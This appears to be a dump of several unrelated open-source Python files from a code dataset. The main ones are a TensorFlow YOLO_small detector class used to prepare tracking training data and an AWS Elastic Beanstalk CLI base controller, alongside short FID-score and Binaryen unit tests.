np.savez(f, mu=mu, sigma=sigma)
stats = fid_score.compute_statistics_of_path(str(path), model,
batch_size=1,
dims=5,
device=device,
num_workers=0)
assert np.allclose(stats[0], mu)
assert np.allclose(stats[1], sigma)
def test_image_types(tmp_path):
in_arr = np.ones((24, 24, 3), dtype=np.uint8) * 255
in_image = Image.fromarray(in_arr, mode='RGB')
paths = []
for ext in fid_score.IMAGE_EXTENSIONS:
paths.append(str(tmp_path / 'img.{}'.format(ext)))
in_image.save(paths[-1])
dataset = fid_score.ImagePathDataset(paths)
for img in dataset:
assert np.allclose(np.array(img), in_arr)
|
test/unit/test_finalize.py | phated/binaryen | 5,871 | 17235 | <reponame>phated/binaryen<filename>test/unit/test_finalize.py
from scripts.test import shared
from . import utils
class EmscriptenFinalizeTest(utils.BinaryenTestCase):
def do_output_test(self, args):
# without any output file specified, don't error, don't write the wasm,
# but do emit metadata
p = shared.run_process(shared.WASM_EMSCRIPTEN_FINALIZE + [
self.input_path('empty_lld.wat'), '--global-base=1024'
] + args, capture_output=True)
# metadata is always present
self.assertIn('{', p.stdout)
self.assertIn('}', p.stdout)
return p.stdout
def test_no_output(self):
stdout = self.do_output_test([])
# module is not present
self.assertNotIn('(module', stdout)
def test_text_output(self):
stdout = self.do_output_test(['-S'])
# module is present
self.assertIn('(module', stdout)
|
3rd party/YOLO_network.py | isaiasfsilva/ROLO | 962 | 17246 | import os
import numpy as np
import tensorflow as tf
import cv2
import time
import sys
import pickle
import ROLO_utils as util
class YOLO_TF:
fromfile = None
tofile_img = 'test/output.jpg'
tofile_txt = 'test/output.txt'
imshow = True
filewrite_img = False
filewrite_txt = False
disp_console = True
weights_file = 'weights/YOLO_small.ckpt'
alpha = 0.1
threshold = 0.08
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
w_img, h_img = [352, 240]
num_feat = 4096
num_predict = 6 # final output of LSTM 6 loc parameters
num_heatmap = 1024
def __init__(self,argvs = []):
self.argv_parser(argvs)
self.build_networks()
if self.fromfile is not None: self.detect_from_file(self.fromfile)
def argv_parser(self,argvs):
for i in range(1,len(argvs),2):
if argvs[i] == '-fromfile' : self.fromfile = argvs[i+1]
if argvs[i] == '-tofile_img' : self.tofile_img = argvs[i+1] ; self.filewrite_img = True
if argvs[i] == '-tofile_txt' : self.tofile_txt = argvs[i+1] ; self.filewrite_txt = True
if argvs[i] == '-imshow' :
if argvs[i+1] == '1' :self.imshow = True
else : self.imshow = False
if argvs[i] == '-disp_console' :
if argvs[i+1] == '1' :self.disp_console = True
else : self.disp_console = False
def build_networks(self):
if self.disp_console : print "Building YOLO_small graph..."
self.x = tf.placeholder('float32',[None,448,448,3])
self.conv_1 = self.conv_layer(1,self.x,64,7,2)
self.pool_2 = self.pooling_layer(2,self.conv_1,2,2)
self.conv_3 = self.conv_layer(3,self.pool_2,192,3,1)
self.pool_4 = self.pooling_layer(4,self.conv_3,2,2)
self.conv_5 = self.conv_layer(5,self.pool_4,128,1,1)
self.conv_6 = self.conv_layer(6,self.conv_5,256,3,1)
self.conv_7 = self.conv_layer(7,self.conv_6,256,1,1)
self.conv_8 = self.conv_layer(8,self.conv_7,512,3,1)
self.pool_9 = self.pooling_layer(9,self.conv_8,2,2)
self.conv_10 = self.conv_layer(10,self.pool_9,256,1,1)
self.conv_11 = self.conv_layer(11,self.conv_10,512,3,1)
self.conv_12 = self.conv_layer(12,self.conv_11,256,1,1)
self.conv_13 = self.conv_layer(13,self.conv_12,512,3,1)
self.conv_14 = self.conv_layer(14,self.conv_13,256,1,1)
self.conv_15 = self.conv_layer(15,self.conv_14,512,3,1)
self.conv_16 = self.conv_layer(16,self.conv_15,256,1,1)
self.conv_17 = self.conv_layer(17,self.conv_16,512,3,1)
self.conv_18 = self.conv_layer(18,self.conv_17,512,1,1)
self.conv_19 = self.conv_layer(19,self.conv_18,1024,3,1)
self.pool_20 = self.pooling_layer(20,self.conv_19,2,2)
self.conv_21 = self.conv_layer(21,self.pool_20,512,1,1)
self.conv_22 = self.conv_layer(22,self.conv_21,1024,3,1)
self.conv_23 = self.conv_layer(23,self.conv_22,512,1,1)
self.conv_24 = self.conv_layer(24,self.conv_23,1024,3,1)
self.conv_25 = self.conv_layer(25,self.conv_24,1024,3,1)
self.conv_26 = self.conv_layer(26,self.conv_25,1024,3,2)
self.conv_27 = self.conv_layer(27,self.conv_26,1024,3,1)
self.conv_28 = self.conv_layer(28,self.conv_27,1024,3,1)
self.fc_29 = self.fc_layer(29,self.conv_28,512,flat=True,linear=False)
self.fc_30 = self.fc_layer(30,self.fc_29,4096,flat=False,linear=False)
#skip dropout_31
self.fc_32 = self.fc_layer(32,self.fc_30,1470,flat=False,linear=True)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess,self.weights_file)
if self.disp_console : print "Loading complete!" + '\n'
def conv_layer(self,idx,inputs,filters,size,stride):
channels = inputs.get_shape()[3]
weight = tf.Variable(tf.truncated_normal([size,size,int(channels),filters], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[filters]))
pad_size = size//2
pad_mat = np.array([[0,0],[pad_size,pad_size],[pad_size,pad_size],[0,0]])
inputs_pad = tf.pad(inputs,pad_mat)
conv = tf.nn.conv2d(inputs_pad, weight, strides=[1, stride, stride, 1], padding='VALID',name=str(idx)+'_conv')
conv_biased = tf.add(conv,biases,name=str(idx)+'_conv_biased')
if self.disp_console : print ' Layer %d : Type = Conv, Size = %d * %d, Stride = %d, Filters = %d, Input channels = %d' % (idx,size,size,stride,filters,int(channels))
return tf.maximum(self.alpha*conv_biased,conv_biased,name=str(idx)+'_leaky_relu')
def pooling_layer(self,idx,inputs,size,stride):
if self.disp_console : print ' Layer %d : Type = Pool, Size = %d * %d, Stride = %d' % (idx,size,size,stride)
return tf.nn.max_pool(inputs, ksize=[1, size, size, 1],strides=[1, stride, stride, 1], padding='SAME',name=str(idx)+'_pool')
def fc_layer(self,idx,inputs,hiddens,flat = False,linear = False):
input_shape = inputs.get_shape().as_list()
if flat:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs_transposed = tf.transpose(inputs,(0,3,1,2))
inputs_processed = tf.reshape(inputs_transposed, [-1,dim])
else:
dim = input_shape[1]
inputs_processed = inputs
weight = tf.Variable(tf.truncated_normal([dim,hiddens], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[hiddens]))
if self.disp_console : print ' Layer %d : Type = Full, Hidden = %d, Input dimension = %d, Flat = %d, Activation = %d' % (idx,hiddens,int(dim),int(flat),1-int(linear))
if linear : return tf.add(tf.matmul(inputs_processed,weight),biases,name=str(idx)+'_fc')
ip = tf.add(tf.matmul(inputs_processed,weight),biases)
return tf.maximum(self.alpha*ip,ip,name=str(idx)+'_fc')
def detect_from_cvmat(self,img):
s = time.time()
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.result = self.interpret_output(net_output[0])
self.show_results(img,self.result)
strtime = str(time.time()-s)
if self.disp_console : print 'Elapsed time : ' + strtime + ' secs' + '\n'
def detect_from_file(self,filename):
if self.disp_console : print 'Detect from ' + filename
img = cv2.imread(filename)
#img = misc.imread(filename)
self.detect_from_cvmat(img)
def detect_from_crop_sample(self):
self.w_img = 640
self.h_img = 420
f = np.array(open('person_crop.txt','r').readlines(),dtype='float32')
inputs = np.zeros((1,448,448,3),dtype='float32')
for c in range(3):
for y in range(448):
for x in range(448):
inputs[0,y,x,c] = f[c*448*448+y*448+x]
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.boxes, self.probs = self.interpret_output(net_output[0])
img = cv2.imread('person.jpg')
self.show_results(self.boxes,img)
def interpret_output(self,output):
probs = np.zeros((7,7,2,20))
class_probs = np.reshape(output[0:980],(7,7,20))
scales = np.reshape(output[980:1078],(7,7,2))
boxes = np.reshape(output[1078:],(7,7,2,4))
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= self.w_img
boxes[:,:,:,1] *= self.h_img
boxes[:,:,:,2] *= self.w_img
boxes[:,:,:,3] *= self.h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
filter_mat_probs = np.array(probs>=self.threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(filter_mat_probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if self.iou(boxes_filtered[i],boxes_filtered[j]) > self.iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([self.classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
def show_results(self,img,results):
img_cp = img.copy()
if self.filewrite_txt :
ftxt = open(self.tofile_txt,'w')
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
if self.disp_console : print ' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4]))+'], Confidence = ' + str(results[i][5])
if self.filewrite_img or self.imshow:
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
if self.filewrite_txt :
ftxt.write(results[i][0] + ',' + str(x) + ',' + str(y) + ',' + str(w) + ',' + str(h)+',' + str(results[i][5]) + '\n')
if self.filewrite_img :
if self.disp_console : print ' image file writed : ' + self.tofile_img
cv2.imwrite(self.tofile_img,img_cp)
if self.imshow :
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(0)
if self.filewrite_txt :
if self.disp_console : print ' txt file writed : ' + self.tofile_txt
ftxt.close()
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
# my addition
def createFolder(self, path):
if not os.path.exists(path):
os.makedirs(path)
def debug_location(self, img, location):
img_cp = img.copy()
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_locations(self, img, locations):
img_cp = img.copy()
for location in locations:
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_gt_location(self, img, location):
img_cp = img.copy()
x = int(location[0])
y = int(location[1])
w = int(location[2])
h = int(location[3])
cv2.rectangle(img_cp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.imshow('gt',img_cp)
cv2.waitKey(1)
def file_to_img(self, filepath):
img = cv2.imread(filepath)
return img
def file_to_video(self, filepath):
try:
video = cv2.VideoCapture(filepath)
except IOError:
print 'cannot open video file: ' + filepath
else:
print 'unknown error reading video file'
return video
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
def find_iou_cost(self, pred_locs, gts):
# for each element in the batch, find its iou. output a list of ious.
cost = 0
batch_size= len(pred_locs)
assert (len(gts)== batch_size)
print("batch_size: ")
ious = []
for i in range(batch_size):
pred_loc = pred_locs[i]
gt = gts[i]
iou_ = self.iou(pred_loc, gt)
ious.append(self, iou_)
return ious
def load_folder(self, path):
paths = [os.path.join(path,fn) for fn in next(os.walk(path))[2]]
#return paths
return sorted(paths)
def load_dataset_gt(self, gt_file):
txtfile = open(gt_file, "r")
lines = txtfile.read().split('\n') #'\r\n'
return lines
def find_gt_location(self, lines, id):
line = lines[id]
elems = line.split('\t') # for gt type 2
if len(elems) < 4:
elems = line.split(',') #for gt type 1
x1 = elems[0]
y1 = elems[1]
w = elems[2]
h = elems[3]
gt_location = [int(x1), int(y1), int(w), int(h)]
return gt_location
def find_best_location(self, locations, gt_location):
# locations (class, x, y, w, h, prob); (x, y) is the middle pt of the rect
# gt_location (x1, y1, w, h)
x1 = gt_location[0]
y1 = gt_location[1]
w = gt_location[2]
h = gt_location[3]
gt_location_revised= [x1 + w/2, y1 + h/2, w, h]
max_ious= 0
for id, location in enumerate(locations):
location_revised = location[1:5]
print("location: ", location_revised)
print("gt_location: ", gt_location_revised)
ious = self.iou(location_revised, gt_location_revised)
if ious >= max_ious:
max_ious = ious
index = id
print("Max IOU: " + str(max_ious))
if max_ious != 0:
best_location = locations[index]
class_index = self.classes.index(best_location[0])
best_location[0]= class_index
return best_location
else: # it means the detection failed, no intersection with the ground truth
return [0, 0, 0, 0, 0, 0]
def save_yolo_output(self, out_fold, yolo_output, filename):
name_no_ext= os.path.splitext(filename)[0]
output_name= name_no_ext
path = os.path.join(out_fold, output_name)
np.save(path, yolo_output)
def location_from_0_to_1(self, wid, ht, location):
location[1] /= wid
location[2] /= ht
location[3] /= wid
location[4] /= ht
return location
def gt_location_from_0_to_1(self, wid, ht, location):
wid *= 1.0
ht *= 1.0
location[0] /= wid
location[1] /= ht
location[2] /= wid
location[3] /= ht
return location
def locations_normal(self, wid, ht, locations):
wid *= 1.0
ht *= 1.0
locations[1] *= wid
locations[2] *= ht
locations[3] *= wid
locations[4] *= ht
return locations
def cal_yolo_loss(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss= sum([(location[i] - gt_location[i])**2 for i in range(4)]) * 100 / 4
return loss
def cal_yolo_IOU(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss = self.iou(location, gt_location)
return loss
def prepare_training_data(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
total_time= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
start_time = time.time()
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
cycle_time = time.time() - start_time
print('cycle time= ', cycle_time)
total_time += cycle_time
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(location, [-1, self.num_predict]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
print "Time Spent on Tracking: " + str(total_time)
print "fps: " + str(id/total_time)
return
def loc_to_coordinates(self, loc):
loc = [i * 32 for i in loc]
x1= int(loc[0]- loc[2]/2)
y1= int(loc[1]- loc[3]/2)
x2= int(loc[0]+ loc[2]/2)
y2= int(loc[1]+ loc[3]/2)
return [x1, y1, x2, y2]
def coordinates_to_heatmap_vec(self, coord):
heatmap_vec = np.zeros(1024)
print(coord)
[classnum, x1, y1, x2, y2, prob] = coord
[x1, y1, x2, y2]= self.loc_to_coordinates([x1, y1, x2, y2])
for y in range(y1, y2):
for x in range(x1, x2):
index = y*32 + x
heatmap_vec[index] = 1.0
return heatmap_vec
def prepare_training_data_heatmap(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
heatmap_vec= self.coordinates_to_heatmap_vec(location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(heatmap_vec, [-1, self.num_heatmap]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
return
def prepare_training_data_multiTarget(self, img_fold, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
print(img_fold)
paths= self.load_folder(img_fold)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
self.debug_locations(img, locations)
# change location into [0, 1]
for i in range(0, len(locations)):
class_index = self.classes.index(locations[i][0])
locations[i][0] = class_index
locations[i] = self.location_from_0_to_1(self.w_img, self.h_img, locations[i])
if len(locations)== 1:
print('len(locations)= 1\n')
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict]), [0,0,0,0,0,0]]]
else:
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict])]]
self.save_yolo_output(out_fold, yolo_output, filename)
return
'''----------------------------------------main-----------------------------------------------------'''
def main(argvs):
yolo = YOLO_TF(argvs)
test = 4
heatmap= False#True
'''
VOT30
0:'Human2'
1:'Human9'
2:'Gym'
3:'Human8'
4:'Skater'
5:'Suv'
6:'BlurBody'
7:'CarScale'
8:'Dancer2'
9:'BlurCar1'
10:'Dog'
11:'Jump'
12:'Singer2'
13:'Woman'
14:'David3'
15:'Dancer'
16:'Human7'
17:'Bird1'
18:'Car4'
19:'CarDark'
20:'Couple'
21:'Diving'
22:'Human3'
23:'Skating1'
24:'Human6'
25:'Singer1'
26:'Skater2'
27:'Walking2'
28:'BlurCar3'
29:'Girl2'
MOT2016
30:'MOT16-02'
31:'MOT16-04'
32:'MOT16-05'
33:'MOT16-09'
34:'MOT16-10'
35:'MOT16-11'
36:'MOT16-13'
37:'MOT16-01'
38:'MOT16-03'
39:'MOT16-06'
40:'MOT16-07'
41:'MOT16-08'
42:'MOT16-12'
43:'MOT16-14'
'''
[yolo.w_img, yolo.h_img, sequence_name, dummy_1, dummy_2]= util.choose_video_sequence(test)
if (test >= 0 and test <= 29) or (test >= 90):
root_folder = 'benchmark/DATA'
img_fold = os.path.join(root_folder, sequence_name, 'img/')
elif test<= 36:
root_folder = 'benchmark/MOT/MOT2016/train'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
elif test<= 43:
root_folder = 'benchmark/MOT/MOT2016/test'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
gt_file = os.path.join(root_folder, sequence_name, 'groundtruth_rect.txt')
out_fold = os.path.join(root_folder, sequence_name, 'yolo_out/')
heat_fold = os.path.join(root_folder, sequence_name, 'yolo_heat/')
yolo.createFolder(out_fold)
yolo.createFolder(heat_fold)
if heatmap is True:
yolo.prepare_training_data_heatmap(img_fold, gt_file, heat_fold)
else:
if (test >= 0 and test <= 29) or (test >= 90):
yolo.prepare_training_data(img_fold,gt_file,out_fold)
else:
yolo.prepare_training_data_multiTarget(img_fold,out_fold)
if __name__=='__main__':
main(sys.argv)
|
ebcli/core/abstractcontroller.py | senstb/aws-elastic-beanstalk-cli | 110 | 17250 | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import textwrap
import json
import sys
import os
from cement.core import controller
from ebcli import __version__
from ebcli.core.ebglobals import Constants
from ebcli.lib import elasticbeanstalk, utils
from ebcli.core import io, fileoperations
from ebcli.objects.exceptions import (
NoEnvironmentForBranchError,
PlatformWorkspaceNotSupportedError,
ApplicationWorkspaceNotSupportedError,
EBCLIException,
NotInitializedError
)
from ebcli.resources.strings import strings, flag_text
from ebcli.objects import region
from ebcli.operations import commonops
class AbstractBaseController(controller.CementBaseController):
"""
This is an abstract base class that is useless on its own, but used
by other classes to sub-class from and to share common commands and
arguments.
"""
class Meta:
label = 'abstract'
stacked_on = 'base'
stacked_type = 'nested'
arguments = [
(['environment_name'], dict(action='store', nargs='?',
default=[],
help=flag_text['general.env'])),
]
epilog = ''
usage = 'eb {cmd} <environment_name> [options ...]'
def do_command(self):
pass
@classmethod
def validate_workspace(cls):
workspace_type = fileoperations.get_workspace_type(None)
is_platform_workspace_only_command = cls.Meta.__dict__.get(
'is_platform_workspace_only_command'
)
requires_directory_initialization = cls.Meta.__dict__.get(
'requires_directory_initialization'
)
if '--modules' in sys.argv:
pass
elif '--help' in sys.argv:
pass
elif cls.__name__ == 'PlatformListController' or cls.__name__ == 'EBPListController':
pass
elif requires_directory_initialization and not workspace_type:
raise NotInitializedError(strings['exit.notsetup'])
elif is_platform_workspace_only_command:
if Constants.WorkSpaceTypes.APPLICATION == workspace_type:
raise ApplicationWorkspaceNotSupportedError(
strings['exit.applicationworkspacenotsupported']
)
@controller.expose(hide=True)
def default(self):
"""
This command will be shared within all controllers that sub-class
from here. It can also be overridden in the sub-class
"""
self.validate_workspace()
self.do_command()
self.check_for_cli_update(__version__)
def check_workspace_type(self, expected_type):
workspace_type = fileoperations.get_workspace_type()
if workspace_type != expected_type:
if Constants.WorkSpaceTypes.PLATFORM == workspace_type:
raise PlatformWorkspaceNotSupportedError(
strings['exit.platformworkspacenotsupported']
)
if Constants.WorkSpaceTypes.APPLICATION == workspace_type:
raise ApplicationWorkspaceNotSupportedError(
strings['exit.applicationworkspacenotsupported']
)
def check_for_cli_update(self, version):
label = self.Meta.label
if label in ('create', 'deploy', 'status', 'clone', 'config'):
if cli_update_exists(version):
if self.check_install_script_used():
io.log_alert(strings['base.update_available_script_install'])
else:
io.log_alert(strings['base.update_available'])
def get_app_name(self):
app_name = fileoperations.get_application_name()
return app_name
def get_env_name(self, cmd_example=None, noerror=False, varname='environment_name'):
env_name = getattr(self.app.pargs, varname, None)
if not env_name:
env_name = commonops. \
get_current_branch_environment()
workspace_type = fileoperations.get_workspace_type(Constants.WorkSpaceTypes.APPLICATION)
if not env_name:
if Constants.WorkSpaceTypes.PLATFORM == workspace_type:
raise EBCLIException(strings['platform.nobuilderenv'])
if noerror:
return None
if not cmd_example:
message = strings['branch.noenv'].replace('{cmd}',
self.Meta.label)
else:
message = strings['branch.noenv'].replace('eb {cmd}',
cmd_example)
io.log_error(message)
raise NoEnvironmentForBranchError()
return env_name
def check_install_script_used(self):
return '.ebcli-virtual-env' in os.path.abspath(__file__)
@classmethod
def _add_to_handler(cls, handler):
handler.register(cls)
@property
def _help_text(self):
"""
Returns the help text displayed when for the commands of the type `eb <command> <subcommand>`
except where <command> is "platform".
"""
longest = 0
def pad(label):
padlength = longest - len(label) + 2
padding = ' '
if padlength < 0:
for x in range(0, longest):
padding += ' '
else:
for x in range(0, padlength):
padding += ' '
return padding
help_txt = ''
for label in self._visible_commands:
if len(label) > longest:
longest = len(label)
for label in self._visible_commands:
cmd = self._dispatch_map[label]
cmd_txt = ' '
cmd_name = label
cmd_aliases = cmd['aliases']
if len(cmd_aliases) > 0 and cmd['aliases_only']:
cmd_name = cmd_aliases.pop(0)
cmd_txt += '{}'.format(cmd_name)
if cmd['help']:
cmd_txt += '{}{}'.format(pad(cmd_txt), cmd['help'])
if len(cmd_aliases) > 0:
cmd_txt += '\n{}(alias: {})'.format(pad(''), ', '.join(cmd_aliases))
cmd_txt += '\n'
help_txt += cmd_txt
if len(help_txt) > 0:
txt = '''{}
commands:
{}
'''.format(self._meta.description, help_txt)
else:
txt = self._meta.description
return textwrap.dedent(txt)
def cli_update_exists(current_version):
try:
data = utils.get_data_from_url(
'https://pypi.python.org/pypi/awsebcli/json', timeout=5)
data = json.loads(data)
latest = data['info']['version']
return latest != current_version
except:
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.